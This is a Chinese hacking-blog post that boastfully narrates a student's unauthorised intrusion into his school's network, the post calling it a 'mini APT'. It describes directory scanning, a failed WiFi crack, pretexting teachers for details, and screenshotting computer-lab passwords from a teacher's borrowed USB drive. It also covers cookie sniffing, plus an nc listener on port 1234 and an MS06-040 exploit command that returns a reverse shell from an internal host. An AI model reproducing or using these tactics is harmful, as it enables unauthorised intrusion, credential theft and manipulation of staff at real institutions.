记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

一次对学校的小型APT

2015-03-08 08:25

一次对学校的小型APT

Author:灭亡Team:安全盒子(www.secbox.cn
Weibo:http://weibo.com/secbox

学校就会各种装 于是在周五放学时准备进行一次测试

学校的内网很严密 未扫到什么有用的东西 但是目测有台机子还有网站 马上拿起我的御剑扫下

图片3

只好开始自己的计划

  • 通过wifi破解手段
  • 拿下wifi运用dsploit继续利用
  • 通过C段渗透拿下内网主机
  • 找到LED屏幕所在位置的主机
  • 然后装X你懂得

我猜中了开头没有猜中结尾

图片5

运用backtrack跑了半个多小时 毛都没搞出来

我开始了对计划的改编

  • 各种办法拿下wifi
  • 闲聊问出led大致在哪里(我这里是推测是路由器80端口 一般lED都是这样

为了全身而退 暂时关闭摄像头 完成目标 打开摄像头

 

图片6

 

突然找到一张校长在网校发的图片 没有任何踪迹 奇了怪了。。老师总对我们说小心点 校长在办公室看着我们 现在看来在逗我

 

……偶遇气象管理预测的老师…

老师:干什么呢 放学了还不走

我:老师 我在等人呢 你们工作忙不忙 (语锋一转)

老师:就天天测下气象管理

我:老师 学校的监控是在哪儿里买的 我家也想买个监控器 我看学校的不错

老师:学校都是用禾泰的 还不错

我:需要网络么 我家没有网 (想要问出到底是不是路由器80端口)

老师:那你还是用别的吧 需要网络

碰见个认识的同学

我:老师再见 我等到同学了

老师:再见

小宇宙爆发 推理帝上身 去教务处 感觉百分之八十在那里

 

(敲门)老师好 我们老师让过来用下电脑 (瞬间变成礼貌好学生在那里)

 

老师(*不耐烦) 快点用

我:老师你U盘借我下行么 我拷下东西

老师(生气):拷什么东西

我:老师别生气 用完马上还你

老师(不太生气了)给你

 

我拿U盘纯粹是缓兵之计 因为实在不知道干什么好了 只能这样 语文没学好无法任性啊

插入优盘一看

找到一个有用的东西

图片7

还好本人迅速一截图 就ok了 不然被发现就不好了

机房密码都拿到手里

进行下一步 前往教师办公室 找到微机老师

 

与老师开始闲扯

老师:诶 小X你怎么来了

我:找你玩了呗 老师

老师:哈哈 玩啥呀 我这么大人了

我:对了,老师LED屏幕字有一个打错了

老师:不是吧 我去看看?

跟老师一起去看了看

老师:哪个有错?

我:看错了 sorry 时候不早了 老师拜拜

老师:拜拜

眼奸的我发现打着一个百度 然后我就用cookies挨个嗅探

终于找到那个了。。

结果发现 问题又来了

图片8

安全狗 迅速拦截了我的嗅探 我怒了 这都6.30了 我已经墨迹这么长时间了 还是功亏一篑么?

冷静 某大牛告诉我思路进了死胡同 我们就换思路

 

于是把刚才机房密码捡了起来 出去到网吧链接下 开始了内网渗透

在本机用NC监听1234端口,执行nc -l -v -p 1234,然后用另一个CMD窗口执行,ms06040rpc 对方IP 本机IP 1234 1

 

然后直接拿下

 

 

费了很大劲 拿下了目标 不装X了 好累啊 休息下吧

122扫 “安全盒子” 二维码 ,关注最新安全资讯!

转载一次对学校的小型APT请注明出自:安全盒子

知识来源: www.secbox.cn/hacker/web/1714.html

阅读:93418 | 评论:0 | 标签:渗透测试 小型APT

想收藏或者和大家分享这篇好文章→复制链接地址

“一次对学校的小型APT”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云

本页关键词